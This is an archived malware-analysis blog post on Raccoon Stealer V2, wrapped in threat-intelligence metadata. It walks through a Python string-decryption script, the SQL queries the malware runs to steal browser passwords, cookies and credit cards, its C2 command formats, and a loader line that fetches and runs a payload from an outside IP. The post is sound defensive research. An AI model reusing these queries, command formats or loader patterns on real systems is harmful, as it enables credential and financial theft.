{
	"id": "ed389411-bec7-4307-b193-2d7debc8ce2c",
	"created_at": "2026-04-06T00:12:17.529279Z",
	"updated_at": "2026-04-10T13:12:47.004205Z",
	"deleted_at": null,
	"sha1_hash": "66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37",
	"title": "Raccoon Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 783828,
	"plain_text": "Raccoon Stealer\r\nBy Mohamed Adel\r\nPublished: 2022-09-12 · Archived: 2026-04-05 15:34:15 UTC\r\nRaccoon Stealer V2 (or RecordBreaker) is a stealer provided as a service for about $200 per month. It is a new version of the Raccoon Stealer that appeared in 2019, went quiet for a while and then returned as this new stealer, which is known as RecordBreaker.\r\nIt comes with a lot of capabilities; it can grab a lot of sensitive information, such as:\r\n1. Steal victim system information\r\n2. Steal victim usernames and passwords stored in the browser\r\n3. Steal the victim browser's autofill information\r\n4. Steal credit card information\r\n5. Steal crypto wallet information\r\n6. Steal Bitcoin wallets\r\n7. Grab any file from the victim system\r\n8. Take screenshots of the victim system\r\n9. Load the next stage\r\nFirst we start with basic analysis. Using Detect It Easy we see that the file does not seem to be packed. Exploring the strings tab, we see a lot of base64-encoded strings and two registry keys, SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall and SOFTWARE\\Microsoft\\Cryptography\r\n[Figure: Strings]\r\nTrying to decode the base64 strings only produces encrypted data, so that is all for the basic insights about the executable. Let's load the sample into IDA (and Ghidra for decompiling).\r\nDynamically resolving DLLs and APIs\r\nIn the entry function we see two function calls at the very beginning, to sub_401000 and sub_404036. By navigating to sub_401000 we see that this function resolves the required APIs.\r\nhttps://d01a.github.io/raccoon-stealer/\r\nPage 1 of 18\n\n[Figure: dll loaded]\r\nAfter going back to the entry function, once the APIs are resolved there is another function call, sub_404036. This function follows a pattern that seems to be decrypting data. The sequence is a call to sub_00401806, which calls CryptStringToBinaryA after calling LstrLenA. 
The call to CryptStringToBinaryA passes the dwFlags parameter 0x00000001 (CRYPT_STRING_BASE64), which decodes the string with the base64 routine and returns a byte array containing the base64-decoded, still encrypted data.\r\n[Figure: decrypt]\r\nAfter decrypting the string there are calls to the function sub_0040A59A, which converts the resulting strings to Unicode strings by calling MultiByteToWideChar.\r\nTo get all the decrypted strings we can use the debugger, or write a script to decrypt them for us:\r\nimport base64\r\nfrom Crypto.Cipher import ARC4  # pycryptodome\r\n\r\n# base64-encoded, RC4-encrypted strings taken from the sample (the full list is abbreviated here)\r\nstrings = ['fVQMox8c', 'bE8Yjg==', 'bkoJoy0=', 'LEtihSAW6eunMDV+Aes3rVhAClFoaQM=',\r\n           '59c9737264c0b3209d9193b8ded6c127', 'XVHmGYV5cH1pvOC0w/cmantl/oG9aw==']\r\nkey = \"edinayarossiya\".encode('utf-8')\r\nfor i in strings:\r\n    cipher = ARC4.new(key)  # RC4 is stateful, so a fresh cipher is needed per string\r\n    print(cipher.decrypt(base64.b64decode(i.encode('utf-8'))))\r\nthe decrypted strings:\r\ntlgrm_\r\news_\r\ngrbr_\r\n%s\\tTRUE\\t%s\\t%s\\t%s\\t%s\\t%s\\n\r\nURL:%s\\nUSR:%s\\nPASS:%s\\n\r\n\\t\\t%d) %s\\n\r\n\\t- Locale: %s\\n\r\n\\t- OS: %s\\n\r\n\\t- RAM: %d MB\\n\r\n\\t- Time zone: %c%ld minutes from GMT\\n\r\n\\t- Display size: %dx%d\\n\r\n\\t- Architecture: x%d\\n\r\n\\t- CPU: %s (%d cores)\\n\r\n\\t- Display Devices:\\n%s\\n\r\nformhistory.sqlite\r\nlogins.json\r\n\\\\autofill.txt\r\n\\\\cookies.txt\r\n\\\\passwords.txt\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Type: multipart/form-data; boundary=\r\nContent-Type: text/plain;\r\nUser 
Data\r\nwallets\r\nwlts_\r\nldr_\r\nscrnsht_\r\nsstmnfo_\r\ntoken:\r\nnss3.dll\r\nsqlite3.dll\r\nSOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\r\nPATH\r\nProductName\r\nWeb Data\r\nsqlite3_prepare_v2\r\nsqlite3_open16\r\nsqlite3_close\r\nsqlite3_step\r\nsqlite3_finalize\r\nsqlite3_column_text16\r\nsqlite3_column_bytes16\r\nsqlite3_column_blob\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nSELECT name, value FROM autofill\r\npera\r\nStable\r\nSELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nSELECT fieldname, value FROM moz_formhistory\r\ncookies.sqlite\r\nmachineId=\r\n\u0026configId=\r\n\"encrypted_key\":\"\r\nstats_version\":\"\r\nContent-Type: application/x-object\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\r\nPOST\r\nMachineGuid\r\nimage/jpeg\r\nGdiPlus.dll\r\nGdi32.dll\r\nGdiplusStartup\r\nGdipDisposeImage\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nBitBlt\r\nCreateCompatibleBitmap\r\nCreateCompatibleDC\r\nDeleteObject\r\nGetObjectW\r\nSelectObject\r\nSetStretchBltMode\r\nStretchBlt\r\nSELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM 
credit_cards\r\nNUM:%s\\nHOLDER:%s\\nEXP:%s/%s\\n\r\n\\\\CC.txt\r\nNSS_Init\r\nNSS_Shutdown\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nSECITEM_FreeItem\r\nhostname\":\"\r\n\",\"httpRealm\":\r\nencryptedUsername\":\"\r\n\",\"encryptedPassword\":\"\r\n\",\"guid\":\r\nProfiles\r\nb\"\\xee\\xefV\u003e\\x0c\\xb5Ge\\xb6,A\\xef\\x87=g)'\\x99\\x0c\\xbf7iT\\xfd\"\r\nb'Ti\\x8d\\xc8\\xf7:\\xdc\\x9f\\xeb\\xff\\xdc\\xef\\xb1\\x154\\xb4*\\x00\\x87\\xd9\\xf0q'\r\nAs we can see, the last two strings do not seem to have been decrypted. If we go back to the start function we see that the string 59c9737264c0b3209d9193b8ded6c127 is a different key, used to decrypt the string XVHmGYV5cH1pvOC0w/cmantl/oG9aw==, and the decrypted string is\r\nThere are some other decryption routines using the same key, but the strings are empty.\r\nThen the malware retrieves the locale name, which has the form \u003clanguage\u003e-\u003cREGION\u003e, and compares it against ru for some reason, but the flow does not change if it matches!\r\nThe malware opens a mutex with the name 8724643052; if it already exists, the malware terminates itself, and if it does not exist, it creates a mutex with that name.\r\nThe next call checks whether the victim process is running as LocalSystem, by calling GetTokenInformation to retrieve the token user data, which includes the SID, and then comparing that SID with S-1-5-18 to see whether the user is running as LocalSystem or not. 
If it is, the function returns 1; otherwise it returns 0.\r\nThe next few instructions retrieve the decrypted strings Content-Type: application/x-www-form-urlencoded; charset=utf-8 and */*, then call a function that formats the input with a given pattern. This function is referenced in a lot of places in the sample.\r\nThis function formats the input string with \\r\\n appended to it and calls the function that seems to do the actual formatting; it is used in many places.\r\nThen the malware calls the function sub_0040A720 after allocating two regions of memory. If we navigate to this function we see that it first references the previously allocated memory, then opens the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\, reads the value MachineGuid and returns it in the EAX register.\r\nThen the malware retrieves the username of the current user and formats the data before sending it. The formatted data is some information about the victim machine, like:\r\nmachineId=\u003cGUID\u003e|\u003cusername\u003e\u0026configId=\u003cpredefined value\u003e\r\nmachineId=d8874349-72d5-492c-8d8c-5e6d3a68e127|d01a\u0026configId=59c9737264c0b3209d9193b8ded6c127\r\nThe configId used is the key that decrypts the C2 IP address. Now the first piece of data is ready to be sent to the attacker, and the function sub_004079F3 does this. First, the function references the IP of the C2 server and makes some comparisons against its beginning to make sure it is in a valid format. 
Then it gets a pointer to the / at the end of the IP address and makes a call to InternetOpenW(\"record\",0,0,0); its first parameter is the User-Agent of the requests sent. Now it is ready to connect to the remote server, so it connects over the HTTP protocol on port 443, the default port for HTTPS.\r\nThen it sends the data to the C2 server set before. The content type sent in the request has the form Content-Type: application/x-www-form-urlencoded; charset=utf-8\\r\\n\\r\\n\\r\\n, and the data is sent in the OptionalHeader parameter, which is sent after the request headers. After sending the data it waits for a response from the server, then parses the response for a specific field containing the word Token: if it finds it, it continues running; if not, it exits.\r\nIt searches for the word libs in the response in order to prepare the legitimate DLLs that the malware requires to run. The command can be of the form:\r\nlibs_nss3:http://{HOSTADDR}/{RANDOM_STRING}/nss3.dll\r\nlibs_msvcp140:http://{HOSTADDR}/{RANDOM_STRING}/msvcp140.dll\r\nlibs_vcruntime140:http://{HOSTADDR}/{RANDOM_STRING}/vcruntime140.dll\r\nThen it retrieves the path of Local AppData (C:\\Users\\d01a\\AppData\\Local) by calling SHGetFolderPathW from the function sub_0040A323, formats it by appending the word Low to the end of the path, and then adds the path to sqlite3.dll and the other downloaded DLLs to the PATH environment variable.\r\nThe malware collects information about the system through the function sub_004097BB. It searches for the word sstmnfo_ in the response of the C2 server; the data to be collected is determined by the response, after a colon : and with a pipe | between the keywords of the data. Then it begins collecting information about the system:\r\n1. 
The locale information; the data is formatted as - Locale:\r\n2. Time zone information; the data is formatted as - Time zone: \u003c%c%ld\u003e minutes from GMT\r\n3. OS version, retrieved by reading the registry key SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName; the data is formatted as - OS: \u003c%s OS\u003e\r\n4. System architecture, by calling GetSystemWow64DirectoryW, which retrieves the path of the system directory used by WOW64 and which only exists on the x64 architecture. The data is formatted as - Architecture: x\u003c%d Architecture\u003e\r\n5. RAM status: it gets the memory status by calling GlobalMemoryStatusEx, which retrieves both the virtual and physical memory usage, and formats it as - RAM: \u003c%d RAM Usage\u003e MB\r\n6. CPU specifications, using the cpuid instruction to retrieve the processor specification. The output of this instruction depends on the value in the eax register; calling cpuid with eax = 0x80000002, 0x80000003 and 0x80000004 gets the Processor Brand String. It also uses the GetSystemInfo API to get the number of processors, and sends it in the format - CPU: \u003c%s CPU Brand\u003e (\u003c%d Cores number\u003e cores)\r\n7. Display: it gets the display information by calling GetSystemMetrics with index 0, which retrieves the width of the screen of the primary display monitor, and formats it as - Display size: \u003c%d\u003ex\u003c%d\u003e\r\n8. Display devices: - Display Devices: \u003c%s\u003e\r\n9. 
Display name and version: it gets this information from the registry key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall and the specific GUID under it, to get the display name and version. Then it generates a random value, appends it to the Content-Type header and saves the data to a file to send it to the attacker's C2 server.\r\nThat's all for the sstmnfo_ functionality. Let's explore the rest of the capabilities of the malware.\r\nThe malware then loads sqlite3.dll and calls the function at sub_00403FAB. This function basically allocates two regions of memory, gets the paths of the %AppData% and %LocalAppData% directories and then transfers the flow to other functions.\r\nLet's explore the first function call, sub_401B13. It recursively searches for the User Data directory and then goes to sub_401E26, which has all the functionality. It first starts looking for the Local State file, reads it and searches for \"encrypted_key\":\" in it, and does the same with stats_version\":\".\r\nThen it starts resolving some functions from sqlite3.dll to use them, gets the path to the Login Data file and copies it to another file.\r\nIt opens a new database connection to the copied Login Data file with a sqlite3_open function call and then executes the SQL statement:\r\nSELECT origin_url, username_value, password_value FROM logins\r\nto steal the saved usernames \u0026 passwords and their associated origin URLs.\r\nActually, to execute that SQL statement, sqlite3_step has to be called. The return value of sqlite3_step can vary, so it checks whether the return value is 100, which means that another row of output is available. 
To retrieve the content of the database, it calls sqlite3_column_bytes16, which returns the size of the data, and sqlite3_column_text16 to get the content as plain text.\r\nAfter collecting this data it formats it in the following form in a file \\passwords.txt to send it: URL:%s USR:%s PASS:%s\r\nIn the same way, it gets the cookies using the SQL statement:\r\nSELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies\r\nand formats them in the following form in a file \\cookies.txt to send it: %s TRUE %s %s %s %s %s\r\nIt gets the autofill name and value pairs in the same way, using the SQL query:\r\nSELECT name, value FROM autofill\r\nand saves the data to a file \\autofill.txt to send it.\r\nThen it reads the content of the Web Data file to extract credit card information using the SQL query:\r\nSELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards\r\nand formats it in the following form in a file \\CC.txt to send it: NUM:%s HOLDER:%s EXP:%s/%s. It does the whole thing with the files in the browser's Default profile path.\r\nFirefox-based browsers are a little different, so it collects the data from them but needs different steps. First it goes to Profiles and searches for cookies.sqlite, opens it using sqlite3 and gets the cookies using the SQL query:\r\nSELECT host, path, isSecure, expiry, name, value FROM moz_cookies\r\nThen it takes the login information from logins.json and dumps the passwords using a PK11SDR_Decrypt function call.\r\nThen it goes to formhistory.sqlite to get the autofill information using the SQL query:\r\nSELECT fieldname, value FROM moz_formhistory\r\nIf the response has the word wlts_, the malware tries to collect all crypto wallet information from the victim. Basically it navigates the whole file system searching for a pattern. 
In the same way, it navigates the whole system searching for wallet.dat, which is a Bitcoin wallet, and if it is found, sends it to the server.\r\nThe response looks like:\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nIf the response has the word grbr_, it searches for the specified files on the system and uploads them to the attacker. The response looks like:\r\ngrbr_dekstop:%USERPROFILE%\\Desktop\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\ngrbr_documents:%USERPROFILE%\\Documents\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\ngrbr_downloads:%USERPROFILE%\\Downloads\\|*.txt, *.doc, *pdf*|-|5|1|0|files\r\nThe malware can collect Telegram Desktop application data if the response has the word tlgrm_.\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\nIt searches for the file specified in the response from the server, navigates to it and copies it to send to the attacker.\r\nTo take a screenshot, the response should have the word scrnsht_. 
First, it resolves APIs from GdiPlus.dll and Gdi32.dll to take a screenshot.\r\nAll APIs resolved:\r\nGdiplusStartup\r\nGdipDisposeImage\r\nGdipGetImageEncoders\r\nGdipGetImageEncodersSize\r\nGdipCreateBitmapFromHBITMAP\r\nGdipSaveImageToFile\r\nBitBlt\r\nCreateCompatibleBitmap\r\nCreateCompatibleDC\r\nDeleteObject\r\nGetObjectW\r\nSelectObject\r\nSetStretchBltMode\r\nStretchBlt\r\nDC\r\nThe malware uses these APIs to take screenshots of the victim system and send them to the attacker.\r\nThe malware can drop a next-stage malware specified in the response from the server containing ldr_.\r\nldr_1:http://94.158.244.119/U4N9B5X5F5K2A0L4L4T5/84897964387342609301.bin|%TEMP%\\|exe\r\nThe malware opens a connection to the server and downloads the content of the file specified in the response to the system. The malware then executes the downloaded file using a ShellExecute API call.\r\nThat's all. The malware clears the files it created and releases the allocated memory regions.\r\nsha256: 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03\r\n51.195.166[.]184\r\nhttps://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/\r\nhttps://bazaar.abuse.ch/sample/022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03/\r\nhttps://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/\r\nhttps://www.sqlite.org/c3ref/funclist.html\r\nhttps://www.sqlite.org/rescode.html\r\nSource: https://d01a.github.io/raccoon-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://d01a.github.io/raccoon-stealer/"
	],
	"report_names": [
		"raccoon-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434337,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.pdf",
		"text": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.txt",
		"img": "https://archive.orkl.eu/66a055a502dcbd9b8cec3bb9cc0301ad4ce34c37.jpg"
	}
}